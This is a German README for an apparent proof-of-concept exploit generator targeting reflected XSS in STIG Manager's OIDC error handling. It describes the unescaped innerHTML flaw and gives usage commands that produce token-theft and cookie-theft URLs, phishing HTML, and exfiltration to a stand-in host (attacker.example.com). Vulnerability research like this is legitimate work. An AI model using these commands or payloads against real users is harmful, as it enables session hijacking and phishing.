
Proof-of-Concept-Exploit-Generator für reflektiertes XSS in der STIG Manager OIDC-Authentifizierung, der den Diebstahl von Sitzungstokens durch manipulierte Callback-URLs und Phishing-HTML-Ausgabe ermöglicht.
Konzeptioneller Proof of Concept für die reflektierte Cross-Site Scripting (XSS) Schwachstelle in STIG Manager Versionen 1.5.10 bis 1.6.7.
Eine reflektierte XSS-Schwachstelle existiert im STIG Manager Web App OIDC-Authentifizierungsfehlerbehandlungscode. Die Abfrageparameter error und error_description, die vom OIDC-Provider zurückgegeben werden, werden direkt über innerHTML ohne HTML-Escaping in das DOM geschrieben. Ein Angreifer, der eine bösartige URL erstellen und einen Benutzer dazu überreden kann, dieser zu folgen, kann beliebiges JavaScript im Anwendungskontext ausführen.
Die Schwachstelle ist am schwerwiegendsten, wenn der angegriffene Benutzer in einem anderen Browser-Tab eine aktive STIG Manager-Sitzung hat – injizierter Code kann mit dem SharedWorker kommunizieren, der das Zugriffstoken verwaltet, und so authentifizierte API-Anfragen im Namen des Opfers ermöglichen.
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html
# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung bereitgestellt.